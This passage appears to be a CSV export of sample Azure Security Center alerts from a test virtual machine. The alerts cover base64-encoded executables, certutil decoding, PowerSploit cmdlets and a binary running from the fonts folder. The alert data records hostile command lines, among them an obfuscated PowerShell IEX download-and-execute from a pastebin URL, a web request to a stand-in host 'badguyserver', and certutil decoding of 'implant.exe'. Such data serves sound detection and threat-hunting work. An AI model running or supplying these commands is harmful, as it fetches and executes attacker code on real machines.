""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
81,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,290559aa-a3d0-425b-8ed2-e98ccc9f0aa0,2518547714885867955_290559aa-a3d0-425b-8ed2-e98ccc9f0aa0,Detection,Microsoft,Detected encoded executable in command line data,Detected encoded executable in command line data,Detected encoded executable in command line data,"Analysis of host data on MSTICALERTSWIN1 detected a base-64 encoded executable. This has previously been associated with attackers attempting to construct executables on-the-fly through a sequence of commands, and attempting to evade intrusion detection systems by ensuring that no individual command would trigger an alert. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""echo tvqqaamaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> delme.b64\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbb4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbb4"",
""CommandLine"": ""cmd /c \""echo tvqqaamaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> delme.b64\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
82,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,df1b9eb2-05c4-4f7c-8540-cbb18ec5c608,2518547714873290756_df1b9eb2-05c4-4f7c-8540-cbb18ec5c608,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1514"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1514"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
83,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,9d6d471a-c94f-4706-b0ff-b2f0301495aa,2518547714880519889_9d6d471a-c94f-4706-b0ff-b2f0301495aa,Detection,Microsoft,Detected suspicious credentials in commandline,Detected suspicious credentials in commandline,Detected suspicious credentials in commandline,Analysis of host data on MSTICALERTSWIN1 detected a supicious password being used to execute a file by activity group BORON. This activity group has been known to use this password to execute Pirpi malware on a victim host.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\implant.exe"",
""Suspicious Command Line"": ""implant.exe k111"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x240"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: BORON\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-BORON.pdf?sv=2018-03-28&sr=b&sig=g3MzIgC1xqZm0vvWa6nQxMYoSh1FN513idawGZj2NPY%3D&spr=https&st=2019-01-15T05:00:15Z&se=2019-04-15T05:15:15Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""implant.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x240"",
""CommandLine"": ""implant.exe k111"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
84,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,5c56421d-d894-4437-9b9a-a3b5c6b7e1df,2518547714882331861_5c56421d-d894-4437-9b9a-a3b5c6b7e1df,Detection,Microsoft,Detected decoding of an executable using built-in certutil.exe tool,Detected decoding of an executable using built-in certutil.exe tool,Detected decoding of an executable using built-in certutil.exe tool,"Analysis of host data on MSTICALERTSWIN1 detected that certutil.exe, a built-in administrator utility, was being used to decode an executable instead of its mainstream purpose that relates to manipulating certificates and certificate data. Attackers are known to abuse functionality of legitimate administrator tools to perform malicious actions, for example using a tool such as certutil.exe to decode a malicious executable that will then be subsequently executed.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\certutil.exe"",
""Suspicious Command Line"": ""certutil -decode delme.b64 implant.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xa08"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""certutil.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xa08"",
""CommandLine"": ""certutil -decode delme.b64 implant.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
85,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,3eb0eb4b-0536-430c-8ab6-cd48524c14b1,2518547714874872692_3eb0eb4b-0536-430c-8ab6-cd48524c14b1,Detection,Microsoft,Suspicious powershell cmdlets executed,Suspicious powershell cmdlets executed,Suspicious powershell cmdlets executed,Analysis of host data indicates execution of known malicious powershell PowerSploit cmdlets.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e0"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
86,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,953def48-a24b-42a9-bd02-7221be90f84a,2518547714876077067_953def48-a24b-42a9-bd02-7221be90f84a,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14ac"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14ac"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
87,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:13,2019-01-15 05:15:13,76336679-bddf-460f-90fb-35a1386de7a6,2518547714867787710_76336679-bddf-460f-90fb-35a1386de7a6,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15e8"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""EndTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
88,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,f4324711-aeae-4912-a634-331b7e7456b6,2518547714857061520_f4324711-aeae-4912-a634-331b7e7456b6,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x178c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x178c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
89,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,9984a237-2dd7-4932-bb8d-23ca535a6254,2518547714829244584_9984a237-2dd7-4932-bb8d-23ca535a6254,Detection,Microsoft,Random process name detected,Random process name detected,Random process name detected,Suspiciously constructed process name detected: c:\diagnostics\usertmp\sdopfjiowtbkjfnbeioruj.exe,Informational,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1564"",
""ModelScore"": ""-21.83"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
